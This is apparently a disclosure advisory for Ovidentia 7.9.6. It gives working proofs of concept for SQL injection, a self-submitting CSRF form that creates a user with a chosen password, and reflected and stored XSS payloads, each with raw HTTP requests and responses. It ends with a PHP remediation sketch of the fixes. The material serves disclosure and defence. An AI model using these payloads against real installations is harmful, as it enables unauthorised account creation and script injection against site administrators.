###########################################################
[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities
[~] Author: sajith
[~] Version: Ovidentia 7.9.6
[~] Vendor Homepage: http://www.ovidentia.org/
[~] Vulnerable app link: http://www.ovidentia.org/telecharger
###########################################################

[1] SQL injection vulnerability (authenticated, administrator)

Log into the admin panel and open the delegation functionality > managing administrators. The id parameter of the link below (tg=delegat&idx=mem) is placed into a SQL query without validation or escaping:

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1

Appending a single quote breaks the query and the application returns the raw MySQL error, so the injection is error-based and trivially confirmed. The error page also discloses the exact query, the table and column names (bab_dg_admin, id_dg) and the absolute filesystem path of the install.

POC by sajith shetty:

request:

GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=

response (excerpt, cut at the start):

style="cursor: pointer" onclick="s=document.getElementById('babParam_1_5_0'); s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div style="display: none; background-color: #EEEECC" id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>) <i>called at</i> [C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.

[2] CSRF vulnerability

Log into the admin portal and open the create-user functionality:

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=

The create-user POST carries no anti-CSRF token, so a page controlled by an attacker and visited by a logged-in administrator can create a new user with a password of the attacker's choosing. The self-submitting form below does exactly that.
<html>
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php" enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="user[sendpwd]" value="0" />
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />
<input type="hidden" name="user[notifyuser]" value="0" />
<input type="hidden" name="grp" value="" />
<input type="hidden" name="idx" value="Create" />
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />
<input type="hidden" name="user[givenname]" value="POC" />
<input type="hidden" name="pos" value="A" />
<input type="hidden" name="widget_filepicker_job_uid[]" value="52a35b7fac6c9" />
<input type="hidden" name="user[email]" value="poctester@xyz.com" />
<input type="hidden" name="user[nickname]" value="1234" />
<input type="hidden" name="user[sn]" value="test" />
<input type="hidden" name="tg" value="users" />
<input type="hidden" name="user[mn]" value="tester" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

[3] Reflected XSS

Whatever is appended to index.php as extra path information is written back, unescaped, into the href of the "Home" link in the page header. A value that closes the attribute with "> therefore lands in the HTML body and executes:

http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x onerror=prompt(1);>

request:

GET /cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95

response (excerpt):

<div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) : http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x onerror=prompt(1);>" title="Home"><img src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home" /></a>
<!--
Script OVML: show the list of the buttons of quick accesses to functions by leaning on entries available in user section -->

[4] Stored XSS

Log into the admin portal, open the mail functionality and create a new domain using the link below:

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y

The Name and Description fields are stored as submitted and later rendered in the domain list without escaping, so the payload runs for every administrator who views that list. Payload: "><img src=x onerror=prompt(1);>

request:

POST /cms/ovidentia-7-9-6/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen

(The test install runs with a German UI: the submit value decodes to "Domäne hinzufügen", i.e. "add domain", and "Registrierte User" in the response means "Registered users". The inmailserver field was sent with a third payload, prompt(333), but it does not appear in the excerpt below, so only the Name and Description fields are confirmed.)

response (excerpt):

<td>Registrierte User</td>
</tr>
<tr class="BabSiteAdminFontBackground">
<td>
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img src=x onerror=prompt(111);></a>
</td>
<td>"><img src=x onerror=prompt(222);></td>
<td>Registrierte User</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</div>
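The sketch below is an added example, not code from the Ovidentia project or from the advisory author. It shows the root cause of each of the four findings above as a minimal vulnerable PHP handler next to a hardened one: the unvalidated id in [1], the token-less create-user POST in [2], and the unescaped output behind both XSS bugs in [3] and [4]. It assumes a PDO connection and PHP sessions; the function names, the $dom array shape and the csrf field name are hypothetical, and only the table/column names bab_dg_admin / id_dg and the URL parameters are taken from the advisory.

```php
<?php
// Added illustration, not Ovidentia's code. Assumptions: a PDO connection is
// passed in, PHP sessions are available, and the names bab_dg_admin / id_dg
// come from the error message in section [1] of the advisory.
declare(strict_types=1);

// [1] tg=delegat&idx=mem&id=1' ----------------------------------------------
function delegation_admins_vulnerable(PDO $pdo, string $id): array
{
    // Verbatim concatenation: id=1' yields exactly the failing query shown in
    // the advisory, select * from bab_dg_admin where id_dg=1'
    $sql = "select * from bab_dg_admin where id_dg=" . $id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

function delegation_admins_fixed(PDO $pdo, string $id): array
{
    // The parameter is an integer id: validate it as one, then still bind it
    // so the value never reaches the SQL parser as statement text.
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        http_response_code(400);
        exit('invalid id');
    }
    $stmt = $pdo->prepare('SELECT * FROM bab_dg_admin WHERE id_dg = :id');
    $stmt->execute([':id' => $n]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// [2] tg=users&idx=Create -----------------------------------------------------
// The create-user POST contains nothing an attacker's page cannot forge. A
// per-session synchronizer token (hypothetical field name "csrf") fixes that:
// emit it in every state-changing form, refuse POSTs that do not echo it back.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32)); // CSPRNG, 256 bits
    }
    return $_SESSION['csrf'];
}

function csrf_field(): string
{
    return '<input type="hidden" name="csrf" value="' . e(csrf_token()) . '" />';
}

function require_csrf(): void
{
    $sent = $_POST['csrf'] ?? '';
    // hash_equals compares in constant time and rejects non-string input.
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('missing or invalid CSRF token');
    }
}

// [3]/[4] both XSS bugs are the same mistake: untrusted text written into HTML
// without escaping. One escaping helper, applied at every output point.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function home_link_vulnerable(string $baseUrl): string
{
    // The extra path after index.php is reflected into the href; the value
    // /foo"><img src=x onerror=prompt(1);> closes the attribute.
    $path = ltrim($_SERVER['PATH_INFO'] ?? '', '/');
    return '<a href="' . $baseUrl . '/' . $path . '" title="Home">Home</a>';
}

function home_link_fixed(string $baseUrl): string
{
    $path = ltrim($_SERVER['PATH_INFO'] ?? '', '/');
    // rawurlencode keeps the value a URL path segment; e() keeps the whole
    // attribute inside its quotes even if the URL encoder is ever bypassed.
    return '<a href="' . e($baseUrl . '/' . rawurlencode($path)) . '" title="Home">Home</a>';
}

function mail_domain_row_fixed(array $dom, string $baseUrl): string
{
    // Stored name/description are escaped at render time, not at save time,
    // so the database keeps the real value and every output path is covered.
    $href = $baseUrl . '/index.php?' . http_build_query([
        'tg' => 'maildom', 'idx' => 'modify', 'item' => (int) $dom['id'],
        'userid' => 0, 'bgrp' => 'y',
    ]);
    return '<tr><td><a href="' . e($href) . '">' . e($dom['name']) . '</a></td>'
         . '<td>' . e($dom['description']) . '</td></tr>';
}

// Self-check from the command line (php fix.php): the advisory's payload is
// rendered as inert text in both output locations.
if (PHP_SAPI === 'cli') {
    $payload = '"><img src=x onerror=prompt(1);>';
    $base = 'http://127.0.0.1/cms/ovidentia-7-9-6';
    $_SERVER['PATH_INFO'] = '/foo' . $payload;
    echo home_link_fixed($base), PHP_EOL;
    echo mail_domain_row_fixed(['id' => 2, 'name' => $payload, 'description' => $payload], $base), PHP_EOL;
}
```

Escaping belongs at the output point rather than on save: the same stored domain name may be rendered into HTML, into an attribute, or into a mail header, and each context needs its own encoder. The CSRF check applies equally to the adddom POST in [4], whose captured body also carries no token.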